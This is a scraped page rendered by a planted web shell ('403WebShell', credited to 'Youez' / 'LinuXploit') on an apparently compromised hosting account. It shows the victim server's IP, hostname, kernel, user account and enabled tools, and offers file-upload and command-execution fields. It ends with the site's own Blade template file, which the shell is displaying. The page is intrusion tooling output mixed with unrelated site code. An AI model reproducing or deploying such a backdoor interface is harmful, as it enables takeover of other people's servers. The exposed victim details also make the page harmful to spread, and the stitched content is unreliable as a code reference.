Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.191.120.103
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/book24.ng/themes/Mytravel/Space/frontend/blocks/term-featured-box/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/book24.ng/themes/Mytravel/Space/frontend/blocks/term-featured-box/index.blade.php
@if(!empty($list_term))
    <div class="bravo-featured-box bg-gray-2">
        <div class="container space-1">
            @if(!empty($title))
            <div class="w-md-80 w-lg-50 text-center mx-md-auto mb-5 mt-lg-10">
                <h2 class="section-title text-black font-size-30 font-weight-bold mb-0"> {{$title}}</h2>
            </div>
            @endif
            <div class="row mb-2">
                @foreach($list_term as $item)
                    <?php
                        $image_url = get_file_url($item->image_id, 'full');
                        $page_search = Modules\Space\Models\Space::getLinkForPageSearch(false , [ 'terms[]' =>  $item->id] );
                    ?>
                    <div class="col-md-6 col-xl-3">
                        <div class="rounded-xs mb-5">
                            <a class="d-block" href="{{ $page_search }}">
                                <div class="bg-img-hero gradient-overlay-half-bg-white transition-3d-hover shadow-hover-2 max-height-200" style="background-image: url({{asset('/images/space-background.jpg')}});">
                                    <div class="text-center py-5">
                                        <i class="{{$item->icon}} font-size-50 text-red-lighter-1"></i>
                                        <h6 class="font-size-17 font-weight-bold text-gray-3 mt-2">{{$item->name}}</h6>
                                        <span class="font-size-14 font-weight-normal text-gray-1">{{ __(':num :text',['num' => count($item->space),'text' => (count($item->space) > 1) ? 'Listings' : 'Listing']) }}</span>
                                    </div>
                                </div>
                            </a>
                        </div>
                    </div>
                @endforeach
            </div>
        </div>
    </div>
@endif

Youez - 2016 - github.com/yon3zu
LinuXploit